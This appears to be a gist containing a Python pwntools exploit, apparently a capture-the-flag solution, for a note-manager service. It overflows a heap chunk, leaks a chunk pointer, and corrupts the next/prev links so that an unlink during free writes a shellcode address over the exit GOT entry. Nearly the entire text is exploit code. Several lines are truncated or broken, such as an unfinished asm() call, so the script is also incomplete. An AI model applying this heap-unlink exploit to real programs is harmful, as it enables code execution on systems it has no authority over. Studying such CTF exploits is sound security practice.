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Last active August 29, 2015 14:18
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from pwn import *
context(arch='i386', os='linux', log_level="info")
HOST = args.get('HOST', "localhost")
PORT = 4000
got_exit = 0x804A010
# account in the shellcode that when we overwrite prev/next
# it may overwrite part of the shellcode, we want to jump over
sc = asm("jmp $+14") + "A" * 12 + asm(
f_hchunk = "<III"
def create_note(size):
r.sendline("%d" % size)
def modify_note(id, size, content):
r.sendline("%d" % id)
r.sendline("%d" % size)
r.recvuntil("your data.")
r.sendline("%s" % content)
def print_note(id):
# leak out the pointer to the previous chunk
r.sendline("%d" % id)
return r.recvuntil("option.")
def remove_note(id):
r.sendline("%d" % id)
with process(HOST) if HOST.startswith("./") \
else remote(HOST, PORT, timeout=0.5) as r:
create_note(len(sc)) # add note 0
create_note(16) # add note 1
size = len(sc)
alloc_size = size + 12 - (size + 12) % 12 + 12
pad_size = alloc_size - size - 12
# modify size 0 to overwrite note2
# overwrite also the size getting over the size allocated
padding = "A" * pad_size
modify_note(0, 100, flat(sc, padding, "AAA"))
# only overwrite 3 bytes for size
# since there is a \n to account for
out = print_note(0)
_hp = (len(sc) + pad_size)
# we will receive the header struct after the shellcode at least
(s, n, p) = struct.unpack_from(f_hchunk, out, _hp)
"leak chunk for note 1: (%s, %s, %s)" % (hex(s), hex(n), hex(p))
sc_addr = p + 12 # add size of the header
# now overwrite again and overwrite next and prev pointer
modify_note(0, 100, flat(
sc, padding, "AAAA", p32(got_exit), # overwrite next
p32(sc_addr) # overwrite prev
# free -> list unlink -> overwrite prev pointer which points to got with
# pointer to the shellcode
# call exit()
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